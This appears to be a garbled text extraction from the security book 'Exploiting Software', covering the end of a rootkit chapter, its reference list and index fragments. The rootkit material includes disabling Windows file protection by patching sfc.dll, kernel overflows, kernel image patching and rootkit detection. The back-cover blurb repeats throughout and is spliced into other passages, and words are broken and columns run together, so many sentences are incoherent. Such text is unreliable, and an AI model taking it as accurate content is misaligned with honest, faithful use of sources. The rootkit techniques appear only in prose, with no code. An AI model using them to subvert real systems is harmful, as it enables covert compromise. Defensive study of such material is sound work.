Disabling Windows System File Protection How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion pdet ect ion sy st aemfew s, and iv irar usesoft war e n ot fkor eep in glem outent t he uy s? The winlogon.exe r ocess loads DLLsant t hat r esponsible imp ingbad sy stgem What t ools can Th beeufile sedsfc.dll t o b reak issoft war Th is book rov ides t he answTh eres.list of files t o b e file p rot ect ion. load ede? , follow ed b yp sfcfiles.dll. pr ot ect ed is loaded int o a m emor y b uff er. A simp le pat ch can b e m ade t o t he code w it h in Ex p lo i t int ghat S owill ft w daisab re isleloaded h ect ex amp r eal t ack s, mad at t ack pat t er t ools, an dows sfc.dll all filewprit ot ion. les Th eofpat ch at can be e using stns, andar d Wind tdebu echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om [ 10] gging API s. at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . [ 10]

For mor e on this issue, see 2 9 / A Labs publications for w ork by Benny and Ratter .

This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t

Writing Directly to Physical Memory Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem A r oot k it d oes not need t o use a loadab le m odule or W in dow s dev ice dr iv er . A r oot k it can be When or kwsecur w orkkern el. An ex cellen t ar t icle on w in dow s inst alled by net simwply r it ingit tyomd ech at a anisms st r uct urdo es ninott he obj ect s and phy sical mem or y is available in Phr ack Magazine , I ssu e 59 , Ar t icle 1 6: " Play ing At t ack pat w it h Window s / dt er evns / ( k ) m em " by cr azy lor d. Rev er se engineer in g Classic at t acksOverflows ag ainst serv er soft w ar e Kernel Buffer Sur pr ising at t acks ag ainst clien t soft war e Cod e in t he k er nel is su bject t o t he sam e b ugs t h at af fect all ot her soft w ar e. Just becau se code is r un ning in t he k ern el doesn 't m ean it ' s imm un e t o st ack ov erf low s and ot her Tech niqu es f or cr aft ing m aliciou s inpu t st andar d - issue ex ploit s. I n f act , sev er al k er nel- lev el ov er f lows hav e been m ade pub lic. The t echn ical det ails of b uf fer ov er f low s Ex ploit ing a buf fer ov er f low in t he k er n el is a bit t r ick y because except ions in t h e k er nel t end t o cr ash Roott he k it sm achine or cau se a " blu e scr een of deat h. " Ex ploit s of t h e ker nel ar e esp ecially not ew or t hy b ecause t h ey can dir ect ly in fect a machin e w it h a r oot kit and t hey b yp ass all secur s. is Anf illed at t ack not need ad ms,inand ist r at e pr iv ileges or t h e y to Ex p loiti yt inmgechanism S o ft w a re witerh does t h e t ools, con cept knivow ledg e necessar y abilit t o b reak load a dev ice dr iv er if t hey can sim ply ov erf low t h e ker nel st ack. An ar t icle on ker nel soft w ar e. ov er f low s can be foun d in Phr ack Magazine , issue 60 , ar t icle 6 : " Sm ashing The Ker nel St ack For Fun And Pr ofit " by Sinan " noir " Er en .

Infecting the Kernel Image Anot h er w ay t o g et code int o t he k er nel is t o pat ch t he k er n el im age it self. We illu st rat e in t his ch apt er a sim ple pat ch t o rem ov e secur it y cont r ols fr om t he NT k er nel. Any piece of code

can be m odified in such a w ay . One needs t o be sur e t o corr ect any in t egr it y ch eck s in t he code, such as t he f ile ch eck sum . An ar t icle on p at ching t he Linux k er nel can b e fou nd in Phr ack Magazine , I ssu e 60 , Ar t icle 8 : " St at ic Ker nel Pat chin g" b y jb t zhm .

Execute Redirection •We also illustTable Content r at eofhow t o rsedir ect ex ecu t ion under W in dow s. For a g ood d iscussion on h ow t o •per for m ex ecut I ndex e redir ect ion un der Lin ux , see " Ad van ces in Kern el Hack ing I I " in Phr ack Expl oit ing Softw How tot Br e ak5 ,Code Magazine , I ssua re e 59 , Ar icle by p almer s. By Gr eg Hoglund , Gar y McGr aw Pub lish er: Addison Wesley Detecting Rootkits Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Ther e ar e sev eral met h ods t o det ect r oot kit s, all of w h ich can b e cir cu m vent ed if t h e r oot kit it self isPages: aw ar51e2of t he t rick . Pat ched m em or y can be det ect ed b y readin g t he call t ables or fu nct ions an d check in g t heir valu es. I nst r uct ions can be coun t ed d ur ing r unt im e and com par ed w it h a b aseline. Any sor t of b eh avior chan ges can, in t heor y , be d et ect ed. Th e key w eakn ess is w hen t he cod e t hat perf or m s t his sor t of check lives on t he sam e m achine t h at has been com pr omised. At t his p oin t , t h e r oot kit can sub ver t t h e code t h at p er for m s t h e Phreak ackon Magazine , I ssu check An sof int er g teak r ick? tHow o detdo ectatat acker r oot k sit m is ake d iscussed How d. oes t west arein br sof t w arine br p ur pose? Whye 59 are, Ar t icle 1 0, " Execut ion Pat h Analy sis: Find in g Ker nel Based Root k it s" by Jan K. Rut k ow i. s? A fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad sk g uy tWhat ool t ot ools det ect r oot k it s in t he Solar is ker nel can be dow n loaded f r om can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. ht t p: / / w w w . im m un it ysec. com .

Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

Conclusion The u lt imat e en d t o m ost soft war e ex ploit s inv olves t h e inst allat ion of a root kit . Root k it s pr ov ide a way for at t ack ers t o r et ur n at w ill t o m ach in es t hat t hey " ow n. " Thus r oot k it s, like t he one w e discuss in t his chapt er , ar e ex t rem ely pow er f ul. Ult imat ely , r oot k it s can b e used •t o con t r ol ever Table of Content y aspect of sa m ach ine. They do t his b y inst allin g t hemselves deep in t h e hear t • a sy st em . I ndex of Expl oit ing Softw a re How to Br e ak Code

Root k itHoglund s m ay ,bGar e yruMcGr n locally or t h ey m ay ar r ive via som e ot h er vect or , like a w or m or a vir us. By Gr eg aw Lik e ot her k ind s of m alicious code, r oot k it s t hr iv e on st ealt hin ess. They h id e t hem selv es away fr om st an dar d sy st em obser v ers, u sin g h ooks, t r am polines, and pat ch es t o get t heir w or k Pub lish er: Addison Wesley don e. I n t h is ch apt er , w e hav e only scr at ch ed t h e sur face of r oot kit s—a su bj ect deser vin g a Pub Dat e: February 17, 200 4 book of it s own . I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

References Alep h1. ( 199 6) " Sm ashing t he St ack f or Fun and Pr ofit . " Phr ack 49 . Nov emb er . •

Table of Content s

•And er son, J. I ndex P. ( 19 73) Com pu t er Secur it y Tech nology Plan nin g St u dy . Rep ort no. ESD- TR- 7 3Expl oit ing Softw a re How to Br e ak Code 51 . Bedfor d, MA: USAF Elect r onic Sy st em s Div ision , Hanscom AFB; Oct ober . By Gr eg Hoglund , Gar y McGr aw

And er son, Ross. ( 2 001 ) Secu rit y Engin eer in g . New Yor k : Joh n W iley & Sons. Pub lish er: Addison Wesley

Pub Dat e: February 17, 200 4

Ch esw ick I SBN: , W0-illiam 20 1- 786R. 95, -8St ev en M. Bellov in, an d Av iel D. Rubin . ( 20 03) Fir ew alls and I n t er n et Secu ritPages: y . 2 nd 51 2ed . Bost on, MA: Add ison - Wesley. Cow an, Cr isp in, Calt on Pu, Dav id Maier , Heat her Hint on , Peat Bak ke, St ev e Beat t ie, Aaron Gr ier, Per r y Wagle, and Qian Zhan g. ( 1 998 ) " Aut om at ic D et ect ion and Pr ev ent ion of Buff erOv erf low At t ack s. " I n : Pr oceedings of t h e 7t h USENI X Secur it y Sy m p osium . San Ant on io, TX: How d oes sof t w br eak How atwt acker sof t w ar eent br at eak Janu ary . Also avare ailable at? ht t p: /do / ww . im m sunmixake . or g/ docum ionon .h tpmurl .pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Dek ker , Ed w ard N. , and Joseph M. New com er . ( 19 99) Develop in g Window s NT Dev ice Exiv p lo i t inAgPrSogr o ft am w am reeris'sloaded w it h. ex amp lesMA: of rAd ealdisonat t ackWesley s, at t ack Dr ers: Han dbook Bost on, . pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . Denn in g, D orot h y E. ( 199 9) I n for m at ion War f are & Secur it y . Read in g, MA: Add ison - Wesley. This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Felt en, Ed, Dirk Balf anz, D rew D ean , and Dan Wallach. ( 1 997 ) " Web Spoofin g: An I nt er net Con Gam e. " I n : Pr oceedings of t h e 20t h NI SSC. Oct ob er . Balt im or e, MD. Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem Gam m a, Er ich, Helm, John son John When net wRich or k ard secur it y mRalph ech anisms do ,n and ot w or k M. Vlissides. ( 199 5) Design Pat t ern s: Elem ent s of Reusable Obj ect - Or ien t ed Sof t w ar e . Read in g, MA: Add ison - Wesley. At t ack pat t er ns How arRev d, Michael, and Dav er se engineer in g id LeBlanc. ( 20 02) Wr it ing Secu re Code . Seat t le: Micr osof t Press. Classic at t acks ag ainst serv er soft w ar e Jones, And y, Gerald L. Kovacich, and Per ry G. Lu zw ick . ( 2 002 ) Global I nfor m at ion War f are: How Bu ernag m ent s, and her swar Achiev e Ob ject iv es and At t ain Com p et it ive Sursinesses, pr ising atGov t acks ainst clienOt t soft e Adv ant ages. New Yor k : Au er bach Publishing . Tech niqu es f or cr aft ing m aliciou s inpu t KanerThe , Cem , and L. of Pels. 19 98) t echn icalDav detidails b uf(fer ov erBad f low Soft s w ar e: Wh at t o Do Wh en Sof t w are Fails . New Yor k: John Wiley & Sons. Root k it s Kr 19 Soft e Vu y Analy . Ph t h esis, TR 98- 0y9.t oWest Exusl, p lo iItvan in g . S( o ft98) w a re is war f illed witlner h t habilit e t ools, con sis cept s, D and kn owCOAST ledg e necessar b reak Laf ay et t e, I N, D ep art m ent of Com pu t er Sciences, Pur due Univ ersit y . soft w ar e. Lan dw ehr , Car l E., A. R. Bu ll, J. P. McD er m ot t , an d W . S. Ch oi. ( 199 3) A Tax onom y of Com pu t er Pr ogram Secur it y Flaw s, w it h Exam ples . Nav al Research Lab orat or y r epor t n o. NRL/ FR/ 554 2- 93 / 959 1. Washin gt on, DC. McClur e, St uar t , Joel Scam b ray , an d Geor ge Ku r t z. ( 19 99) Hacking Ex posed : Net w or k Secu rit y Secret s an d Solut ions . New Yor k : Osb orn e.

McGr aw , Gar y , and Ed Felt en . ( 19 98) Secu ring Jav a: Get t ing Dow n t o Busin ess w it h Mobile Cod e. New Yor k : Joh n W iley & Sons. Mish, F. C., et al. , eds. ( 19 97) Mer riam Webst er 's Collegiat e Dict ionar y . 1 0t h ed. Spr ing field , MA: Merr iam –Webst er, I nc., p. 1 117 . •

Table of Content s



I ndex

My hr v old , Nat han . ( 19 95) " The Phy sicist ." Wired Magazine . I ssu e 3( 9 ) . Av ailab le at Expl oit ing Softw a re How to Br e ak Code w w w .w ir ed. com / w ir ed / ar ch ive/ 3. 09 / m yh rv old. ht m l? By Grson eg Hoglund , Garm y McGr aw opic_set = w ir ed people. Sept em ber 19 95. Accessed 1/ 6/ 0 3. per = gor don_ oore&t Pub lish er: Addison Wesley

Neum ann, Pet er G. ( 19 95) Com pu t er- Relat ed Risk s. Read in g, MA: Add ison - Wesley. Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 51 2 and Bob Fleck . ( 2003 ) 80 2. 11 Secu rit y . Sebast apol, CA: O'Reilly and Pot t er Pages: , Br uce, Associat es.

Ru bin, Av iel. ( 200 1) The W hit eh at Secur it y Ar senal: Tacklin g t h e Thr eat s . Bost on, MA: Add ison- Wesley. How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What id, t ools be uAnu sedpt Ghosh. o b reak (soft war e? Th is oach book tporov ides answ er s. Schm Matcan t , and 1 999 ) An Appr Test in gt he COTS Soft war e f or Rob ust ness t o Operat ing Syst em Ex cept ions and Er r or s . Pr esent ed at t he 1 999 I nt er nat ional Ex p loosiu i t in g o ftSoft w aw rear iseloaded w ityhEng ex amp r eal at t ack at t ack t er t ools, an d Sy mp m Son Reliabilit ineerles ingof. Boca Rat ons, , FL. Nov pat emb erns, 1–4 . t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . Schneier, Bru ce. ( 2 000 ) Secr et s and Lies: Digit al Secur it y in a Net w or ked Wor ld . New Yor k : This m ust - h&ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he John Wiley Sons. scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Spit zn er , Lance. ( 200 3) Honey pot s: Tr acking Hack er s. Bost on, MA: Ad dinson- Wesley . Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem k 84) secur" Ref it y lect m ech anisms ot Tr w or k . " Com m un icat ion s of t he ACM , 2 7( 8) . ThomWhen pson, net Kenw. or ( 19 ions on Tr do ustning ust At t ack pat t er ns Vieg a, John , and Gar y McGraw . ( 2002 ) Build ing Secu re Soft w ar e: How t o Av oid Secu rit y Revser engineer Pr oblem t hse e Right Wayin.gBost on, MA: Ad dison- Wesley . Classic at t acks ag ainst serv er soft w ar e Voas, Jeff , and Gar y McGr aw . ( 1 999 ) Soft war e Fault I nj ect ion: I noculat ion Sof t w ar e Again st Sur pr ising acks agiley ainst Er r or s. New Yor kat : tJoh nW & clien Sons.t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t Whit t aker , Jam es A. ( 20 02) How t o Br eak Sof t w ar e: A Pr act ical Gu id e t o Test in g . Bost on, MA: The Wesley. t echn ical det ails of b uf fer ov er f low s Add isonRoot k it s Whit t aker , Jam es, an d Her ber t Th omp son . ( 20 03) How t o Br eak Sof t w ar e Secur it y . Bost on, Ex p lo i t in g S oWesley ft w a re. is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak MA: Addisonsoft w ar e. Youn g, Ad am, and Mot i Yu ng. ( 199 7) Den iable Passw or d Snat ching : On t h e Possib ilit y of Ev asive Elect r onic Esp ion age. I n: Pr oceedings of t h e I EEE Sym posium on Secu rit y an d Pr iv acy. Oakland , CA. p p. 2 24– 235 . Zuse, Hor st . ( 199 1) Soft war e Com p lex it y : Measur es and Met h ods ( Pr ogr am m ing Com plex Sy st em s, no. 4) . Ber lin : Walt er d e Gr uy t er.



Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

[ SYMBOL] [ A] [ B] [ C] [ D ] [ E] [ F] [ G] [ H ] [ I ] [ J] [ K ] [ L] [ M] [ N] [ O ] [ P] [ Q ] [ R] [ S] [ T] [ U] [ V] [ W ] [ X] [ Z ]



Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

[ SYMBO L] [ A] [ B] [ C] [ D ] [ E] [ F] [ G] [ H ] [ I ] [ J] [ K ] [ L] [ M] [ N] [ O ] [ P] [ Q ] [ R] [ S] [ T] [ U] [ V] [ W ] [ X] [ Z ] % 00u f orm at t oken 2nd 3rd % n f orm at t ok en 2nd % s f orm at st ring 2nd . CALL inst ruction . END in st ruct ion .•ENTER in st ruct ion Table of Content s .•LEAVE inst ru ction I ndex .Expl NET oit ing Softw a re How to Br e ak Code and Java 2nd By Gr eg Hoglund , Gar y McGr aw ex t ensibilit y of 2nd fut u re of Pubinst lishruer: Addison Wesley . PROC ct ion Pub Dat February 17, 200 4 . PROCEND ine: st ruct ion / GS compiler I SBN:o ption 0- 20 12nd 7863rd 95 -8 4t h 5t h _ _secu rit y_ check_co Pages: 51 2 okie fun ct ion _ _secu rit y_ error_h andler fu nct ion _set _ securit y_error_ han dler fu nct ion 0da y exploit s I DSs for undisclosed

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are 43 0TX chips fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? 80 48 ch ips What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. 82 43 9TX ch ips

82 55 9 chips 2nd

Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d 93 C46 ch ips t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

[ SYMBOL] [ A ] [ B] [ C] [ D ] [ E] [ F] [ G] [ H ] [ I ] [ J] [ K ] [ L] [ M] [ N] [ O ] [ P] [ Q ] [ R] [ S] [ T] [ U] [ V] [ W ] [ X] [ Z ] Access low- level disk 2nd root to execu t able files 2nd Access Cont rol List s ( ACLs) Access r equ irement audit • Table of sContent s Act 2nd • ivat in g pay loads I ndex Act ivat es ina inj v ect Expl oition ingzon Softw re ection How to Brors e ak2nd Code Act ive armo r By Gr eg Hoglund , Gar y McGr aw Act iveX and Web browsers 2nd Pub lish er: preloa der , loAddison cal f ilenWesley ames with Dat e: fun February add_Pub long_cmt ct ion 17, 200 4 Adding users I SBN: 0- 20 1- 786 95 -8 AddressPages: resolut51 ion2 prot ocol (ARP) cache poisoning at t acks in pack et leak ing in 2nd Address- based arit h met ic 2nd Addresses ef fect iv e

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are in in ject ion vect ors fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? I P 2nd What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. ADM ( Associat ion De Malfait eurs) ADM w0 rm

Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d Admin ist rat or access, need f or t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om Adopt ion rat es of t echn ologies at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . Aggregat ion elem en t s AI X/ PowerPC loads 2nd 3rd 4t h shock 5t h This m ust - pay h ave book m ay Akk scr erm ipt an, k idWich die ert rt eat m en t

y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he f ound in m any hack ing book s, you w ill learn abou t

Alchemy Ey e Net work at ta cks 2nd Allo cat ed m em ory in h eap ov erflows 2nd 3rd 4t h 5t h

sof gt w[ See ar eEqu exivploit ill t con inue Altern atWhy e encodin alen t w inpu an d trequ estts]o

be a ser ious p r oblem

Altern at ive I P ad dresses

net or ks AN/ SP5When -7 3 radar syw stem

secur it y m ech anisms do n ot w or k

Analog in- band swit ching signals

At tEngine ack pat t er ns Analyt ical AND operat or

Rev er se engineer in g

Anom aly -based I DSs 2nd

Ant i-aircraft radar sy st em s

Classic at t acks ag ainst serv er soft w ar e

Apache HTTPD, ov erflow in API calls

Sur pr ising at t acks ag ainst clien t soft war e

buf fer o verf low in 2nd for reverse engineering Tech niqu es f or

cr aft ing m aliciou s inpu t

mappin g 2nd 3rd tr acing The

t echn ical det ails of b uf fer ov er f low s

API m on it or s f or in ject ion point s 2nd API SPYRoot t ool k it s Applicat ion securit y v s. sof t ware secu rity

Ex p lo iion t inServ g Sice o ft wvider a re (ASP) is f illed witofhsoft t hwar e t eools, con cept s, and kn ow ledg e necessar y t o b reak Applicat Pro model licen sing soft w ar e. vs. operat in g syst em s Applicat ions Apply in g at t ack pat tern s 2nd 3rd 4t h 5t h Archit echt u ral f low 2nd 3rd Argum ent s ex pan sion of, bu ff er ov erflow fr om in sh ell com man d in ject ion Arit hm et ic address-ba sed 2nd buf fer o verf low f rom 2nd 3rd 4t h 5t h 6t h

ARP ( address resolut ion prot ocol) cache poisoning at t acks in pack et leak ing in 2nd ARPANET asp dot bu g ASP pages, em bedd in g Perl wit hin Associat ion De Malf aiteu rs ( ADM) Assum pt ions

• •

Table of Content s

in at t ack pat tern s 2nd

I ndex

underm ining Expl oit ing Softw a re How to Br e ak Code at u t ilit y By Gr eg9 Hoglund , Gar y McGr aw ATMEL 3C4 6 chips At taching t o ru nn ing processes 2nd At tack ples Pubexam lish er: Addison Wesley adding a e: u ser wit h inj17, ection Pub Dat February 200 4 address-ba sed arit hm et ic prob lem I SBN: 0- 20 1- 786 95 -8 alchemy ey e n etwo rk m anagem en t sof t ware f ile sy st em Pages: 51 2 alt ern at e encodin g t riple dot in Spoo nFTP alt ern at e encodin g wit h ghost char act er s in FTP a nd Web serv er s Apache HTTPD cook ie bu ff er ov erflow Balt im ore Techn ologies MailSweeper breakin g Oracle 9 i wit h a sock et at ta ck

How sof breteak ? How t acker bufd feroes o verf lowt w inare I n tern Explorer 4. 0do via at EMBED t ags m ake sof t w ar e br eak on p ur pose? Why are fir ew intlow ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? bufalls, fer o verf in TERM What t ools u sedrout t o erb reak soft ThCPU is book p rov ides t he answ er s. buf fer o verfcan low onbe a Cisco runn ing on war a Mote? orola buf fer q verf low in $HOME

Ex building p lo i t inbinary g S o files ft w uasing re isdebug. loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d exe wit h inj ect io n t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om building t ext f iles wit h inj ect ion at t C5 ackclear , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . f orward and seize in- band at t ack Cold Fusion CFEXECUTE argu ment inj ection

This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he combin ed encodin gs in CesarFTP scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t def ined

dot less I P addresses in I n t er net Explorer EasyWhy News sof PHPt w script ar eXSS ex ploit

w ill con t inue t o be a ser ious p r oblem

em bedded Perl script t h at calls sy stem () t o execu te net cat em bedded h in ASP When Perl netscript w or sk wit secur it y

m ech anisms do n ot w or k

em bedded scr ipt in non script elemen t fr om GNU mailm an XSS en t rust and inject At t ack pat tion er ns escaped slash es in alt er nat e enco din gs

Rev er () sef un engineer in g Excel host ct ion ex ecut able f ont s

t acks ag ainst serv er file Classic t rav ersal, at query st ring, an d Grou pWise

soft w ar e

file t rav ersal, query st ring, an d Hsphere

Sur pr ising at t acks ag ainst clien t soft war e

filt er f ailu re in Taylor UUCP daem on FTP glob( )

Tech niqu es f or cr aft ing m aliciou s inpu t

Horde I MP

Hot mail Java t ag f ilt erin g

The t echn ical det ails of b uf fer ov er f low s

HPUX passwd

HTTP headers Root k it s in webalizer XSS I nf ormix dat abase f ile sy st em in lo jecti tion Ex p in and g SFTP o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak in ject ion and rem ote xt erm s soft w ar e. in ject ion and Tiny FTP ( TFTP) I PSwit ch I m ail, blind t rust ed m ailbox n ame ix sso. query Activ eX obj ect Javascript aler t dialog XSS keyboard buf fer inj ect ion Libc in FreeBSD local f ilen ames and t he Act iveX preloa der th e I n tern et Ex plorer Get Object () call

At tack pat t er ns 2nd alt ern at e encodin g of leading gho st ch aract ers alt ern at ive I P addr esses API calls for buf fer over flow applyin g 2nd 3rd 4t h 5t h argum ent in ject ion att ack er viewpoin t 2nd

• •

bin ary r eso urce f iles

Table of Content s

blu eprint s for disast er 2nd 3rd

I ndex

boxes Expl oit ing Softw a re How to Br e ak Code C+ + com piler ex ample 2nd 3rd 4t h 5t h 6t h 7t h 8t h 9t h By Gr eg Hoglund , Gar y McGr aw choosin g clien t invisibility clien side ject ion and buf fer overf low Pub tlish er: inAddison Wesley comm ande:delimit ers 17, 200 4 Pub Dat February con figu rat ion files I SBN: 0- 20 1- 786 95 -8 for search pat hs Pages: 51 2 to ru n comm and t o elev ated priv ilege cont ent -b ased f ile system f un ct ion in ject ion def ined dir ect access t o ex ecut able f iles emb eddin g script s

